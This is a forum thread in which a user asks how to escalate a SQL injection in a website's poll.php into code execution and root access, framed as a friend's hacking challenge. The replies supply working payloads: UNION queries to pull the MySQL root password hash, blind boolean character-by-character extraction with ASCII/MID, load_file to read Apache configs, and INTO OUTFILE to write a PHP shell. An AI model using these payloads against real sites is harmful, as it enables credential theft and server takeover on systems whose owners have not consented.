Sign in to follow this  
Followers 0
FestarBG

RCE through SQL Injection?

5 posts in this topic

Hi,

a friend of mine gave me a kind of security test - he wants me to hack his box through a vulnerable web page.I win if I am able to make a folder in a writable directory called "skiddie" and eventually gain root privileges and make a folder in another directory.I found that the site is vulnerable to a sql injection:

hxxp://*****.com/poll.php?id=1 union select null,null,"test",null–

And the website returns the word "test".Insted of "test" I tried:

database() - joomla

user() - root@localhost

@@datadir - /var/lib/mysql/

@@version - 5.0.75-1

I was also able to extract the admin username and password,but I can’t crack the hash.The first thing that came to my mind was to use null,"php code" into outfile "/var/www/",but it doesn’t work.It seems I don’t have privileges to write in "/var/www" also do not know the directory where the website is - "/var/www/DIR?".Can you give me a hint how to proceed?

Thanks.

:)

Edited by FestarBG
0

Share this post


Link to post
Share on other sites

Well you may just want to try making it have an error.

Usually if verbose errors are enabled it will freak out and give you the full path

For example:

hxxp://anysiterunningw0rdpr3s$.com/wp-settings.php

Dig around for an includes directory or something. You can almost always get it

to fork an error of some sort.

EDIT: Seeing as your root, you may want to check out the mysql.user and the INFORMATION

schema tables:

Since you're using the particular versions that you are:

http://dev.mysql.com/doc/refman/5.0/en/inf...ion-schema.html

might even try :

hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE host='localhost' AND user='root'),null–

hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE user='root' LIMIT 1),null–

(SELECT Password FROM mysql.user WHERE host='localhost' AND user='root')

OR

(SELECT Password FROM mysql.user WHERE user='root' LIMIT 1)

May return a SQL 5.0 password hash, since you are running as root, after all.

Edited by RETN
0

Share this post


Link to post
Share on other sites

OK, I'll search for some verbose errors.

Neither of the queries works.I tried

poll.php?id=1+union+select+null,password,null,null+from+mysql.user+where+user="root"+limit+0,1--

Works, but the hash isn't extracted.

Any other ideas.. :huh:

0

Share this post


Link to post
Share on other sites

Try

<span class="postcolor">poll.php?id[]=1</span>

for kicking errors.

The mysql might not be world facing and wouldn't be that uncommon if it doesn't even have a pw.

Try using load_file to locate the apache httpd.conf, find the document root, then try outfile again.

A few Apache conf locations to try

0

Share this post


Link to post
Share on other sites

You may want to try some boolean enumeration. See if the following works:

hxxp://*****.com/poll.php?id=1%20AND%201=1

hxxp://*****.com/poll.php?id=1%20AND%201=0

The first should return whatever is usually there, and I'm guessing that the second

should make no "poll" display. If you get this far, you have a working true and false.

If this is the case, then,

hxxp://*****.com/poll.php?id=1%20AND%20((ASCII((MID((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1),1,1))))>96)

Will tell you if the ascii code of the first character of the password is greater than 96 (lowercase a or above). If this works,

You'll want to break out an ascii chart to cross compare. You should be able to modify the above query to properly isolate

the correct values. I am not 100% sure about MySQL 5.0, but I believe the hash to be stored in hexadecimal, meaning your

possible ascii codes will be 97-102 (a-f) and 48-57 (0-9). You may also want to find the length of the hash with the following

comparison:

hxxp://*****.com/poll.php?id=1%20AND%20((LENGTH((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1)))>10)

This will "return true" if the length of the hash is greater than ten.

Happy hacking. Hope this helped.

EDIT: SQL Syntax

EDIT: One more thing -- you may want to check out the grants table. This will tell you if it's A) world accessible or B) you have the privileges you want. Just a thought.

Edited by RETN
0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0